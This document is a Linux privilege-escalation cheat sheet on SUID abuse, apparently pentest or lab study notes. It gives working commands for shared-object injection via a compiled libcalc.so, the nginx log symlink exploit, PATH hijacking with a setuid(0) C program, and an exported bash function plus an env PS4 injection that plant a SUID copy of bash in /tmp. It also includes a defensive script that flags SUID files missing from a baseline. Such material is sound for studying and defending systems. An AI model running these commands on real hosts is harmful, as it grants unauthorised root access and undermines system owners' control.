SUID
Enumeration
find / -perm -u=s -type f 2>/dev/null
This lists every file on the system with the SUID bit set (errors from directories we cannot read are discarded).
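As an added defender-side example that is not part of the original notes: the same find output can be compared against a baseline and scanned for SUID files in places a package would never install them, which is how the /tmp/bash and service binaries created in the later sections show up. The sample list and the baseline below are constructed, not taken from a real host.

```shell
#!/bin/sh
# Constructed sample (not from the page) of what
#   find / -perm -u=s -type f -printf '%u %p\n' 2>/dev/null
# might return on a host after the techniques in these notes were used.
SAMPLE_SUID_LIST='root /usr/bin/sudo
root /usr/bin/passwd
root /usr/local/bin/suid-so
root /tmp/bash
user /home/user/.config/service'

# Constructed baseline (not from the page): SUID paths recorded on a
# known-good build of the same image, one path per line.
BASELINE_SUID_LIST='/usr/bin/passwd
/usr/bin/sudo'

# Print every SUID path in $1 ("owner path" lines) that the baseline in $2
# does not list. A new entry means something set the SUID bit after the
# baseline was taken, which is exactly what a chmod +s on a copied shell does.
suid_not_in_baseline() {
  printf '%s\n' "$1" | while read -r owner path; do
    if ! printf '%s\n' "$2" | grep -Fxq -- "$path"; then
      echo "$path"
    fi
  done
}

# Print SUID files sitting in user-writable trees (/tmp, /var/tmp, /dev/shm,
# home directories) or owned by a non-root account; a legitimate package
# rarely installs a SUID binary in any of those places.
flag_suspicious_suid() {
  printf '%s\n' "$1" | while read -r owner path; do
    case "$path" in
      /tmp/*|/var/tmp/*|/dev/shm/*|/home/*)
        echo "$path (SUID in user-writable tree)" ;;
      *)
        if [ "$owner" != root ]; then
          echo "$path (SUID but owned by $owner)"
        fi ;;
    esac
  done
}

# Stand-alone run against the constructed sample.
suid_not_in_baseline "$SAMPLE_SUID_LIST" "$BASELINE_SUID_LIST"
flag_suspicious_suid "$SAMPLE_SUID_LIST"
```

On a real host, replace SAMPLE_SUID_LIST with the live find output and keep the baseline file somewhere the audited machine cannot modify.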
Exploitation
Here again we can check GTFOBins for the binary; if it is listed there, the entry documents how its SUID bit can be abused.
Practice
You can see an example of this exploit in this writeup.
SUID - Shared Object Injection
Enumeration
find / -type f -perm -04000 -ls 2>/dev/null
ls -al nameoffile
Exploitation
In our example the file is
/usr/local/bin/suid-so
strace /usr/local/bin/suid-so 2>&1
With a grep on what could be interesting:
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
This shows what the binary does with files at runtime. This is where we check whether we have write access to one of the files it uses. In our example we will use this file from the output:
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
Once we find such a file, we can try to overwrite it with a payload to elevate our privileges.
We make a directory for our file
We compile our file:
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c
In my example the file I will overwrite is /home/user/.config/libcalc.so
This way we just need to run the SUID file, which in our example is
/usr/local/bin/suid-so
SUID - Binary Symlinks
Issue with the logs created by nginx
Enumeration
./linuxexploitsuggester.sh
We should see this output:
[+] [CVE-2016-1247] nginxed-root.sh
Or we can look for this specific vulnerability manually by checking the nginx version:
dpkg -l | grep nginx
Now we need to check whether the SUID bit is set on sudo:
find / -type f -perm -04000 -ls 2>/dev/null
or
ls -al /usr/bin/sudo
Exploitation
ls -al /var/log/nginx
We will need to create a malicious symlink. We will use this script to do so:
./nginxed-root.sh /var/log/nginx/error.log
Check out this resource to learn more about this escalation path.
SUID - Environmental Variables
Enumeration
Exploitation
Let's create a malicious service binary and add it to our path so that it is launched instead of apache:
printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main() {setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.c
gcc /tmp/service.c -o /tmp/service
SUID - Environmental Variables with full path to binary
Instead of creating a malicious binary we create a malicious function:
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
Then we export our function into the environment:
export -f /usr/sbin/service
Finally we just need to launch the SUID binary that calls the service:
/usr/local/bin/suid-env2
OR
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'